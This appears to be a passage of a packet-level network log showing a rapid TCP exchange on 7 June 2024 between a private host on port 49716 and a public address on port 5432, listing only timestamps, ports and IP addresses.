Jun 7, 2024 17:21:17.424983025 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425012112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425048113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425064087 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425066948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425100088 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425116062 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425132036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425162077 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425192118 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425729990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425782919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425812960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425836086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425836086 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425847054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425879955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.425903082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425903082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.425956011 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.426918030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.426974058 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.426994085 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427007914 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427032948 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427042961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427069902 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427153111 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427665949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427719116 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427748919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427772999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427772999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427781105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.427788973 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.427894115 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428688049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428764105 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428764105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428795099 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428827047 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428847075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428853035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428880930 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428914070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428925037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428925037 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428950071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.428976059 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.428982019 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.429037094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.429037094 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.430946112 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.430999994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431000948 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431054115 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431057930 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431087971 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431109905 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431135893 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431143999 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431178093 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431212902 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431216002 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431241035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431246996 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431282997 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431293964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431293964 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431315899 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431338072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431349993 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431360006 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431421041 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431633949 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431663036 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431685925 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431711912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431716919 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431746960 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431778908 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.431790113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431790113 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.431827068 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433346033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433376074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433419943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433419943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433428049 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433480978 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433512926 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433537006 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433548927 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433578014 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433582067 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433614969 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433614969 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433629036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433650017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433684111 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.433696985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433696985 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.433809996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435097933 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435142994 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435157061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435185909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435204029 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435237885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435240030 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435273886 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435290098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435307026 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435338974 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435342073 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.435359001 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.435389996 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436193943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436228037 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436268091 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436275005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436275005 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436300039 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436316013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436351061 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436903954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436933041 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436958075 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.436984062 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.436985970 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437019110 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437046051 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437052011 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437072992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437139034 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437647104 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437676907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437716961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437716961 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437730074 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437762976 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437779903 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437797070 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.437838078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437838078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.437983990 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.438011885 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.438049078 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.438065052 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.438097954 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.438117981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.438117981 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.438132048 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.438177109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.438177109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.439796925 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.439851046 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.439857960 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.439881086 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.439910889 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.439913034 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.439924955 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.439975977 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.440814972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.440845013 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.440879107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.440887928 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.440887928 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.440932989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.440933943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.440988064 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.440995932 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441021919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441055059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441090107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441108942 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441154003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441154003 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441353083 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441381931 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441411972 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441433907 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441451073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441468000 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441502094 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441505909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441505909 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441584110 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441881895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441910982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441939116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441965103 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.441989899 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.441993952 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442013979 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442039967 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442318916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442348957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442399979 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442418098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442418098 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442434072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442451954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442467928 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.442512989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.442512989 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443126917 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.443156004 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.443181992 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443209887 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.443242073 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443243027 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.443276882 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.443283081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443283081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443329096 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.443970919 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444003105 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444055080 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444088936 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444089890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444089890 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444123030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444143057 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444143057 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444216013 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444818974 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444873095 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444874048 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444905043 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.444940090 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.444961071 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445709944 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445739985 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445775032 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445791006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445822954 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445842028 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445851088 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445877075 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445900917 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445911884 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445928097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445944071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445954084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.445979118 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.445995092 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.446073055 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.446482897 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.446512938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.446559906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.446559906 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.446621895 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.446650982 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.446690083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.446690083 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447464943 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447494030 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447527885 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447547913 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447561026 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447582006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447616100 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447623014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447623014 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447695971 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447891951 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447946072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.447946072 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.447978973 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.448018074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.448018074 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.448848963 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.448900938 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.448905945 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.448945999 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.448955059 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.448987961 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449011087 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449019909 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449062109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449062109 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449202061 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449234009 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449254036 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449383020 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449455023 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449489117 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449522972 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.449538946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449538946 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.449575901 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450110912 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450145006 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450166941 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450180054 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450189114 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450212002 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450236082 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450282097 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450762033 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450815916 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450835943 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450845957 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450858116 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450877905 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450910091 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450931072 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450938940 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.450962067 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.450995922 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451008081 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451009035 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451034069 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451066017 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451081038 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451081038 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451119900 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451764107 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451792955 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451828003 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451842070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451842070 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451878071 CEST	5432	49716	116.202.190.18	192.168.2.5
Jun 7, 2024 17:21:17.451888084 CEST	49716	5432	192.168.2.5	116.202.190.18
Jun 7, 2024 17:21:17.451911926 CEST	5432	49716	116.202.190.18	192.168.2.5
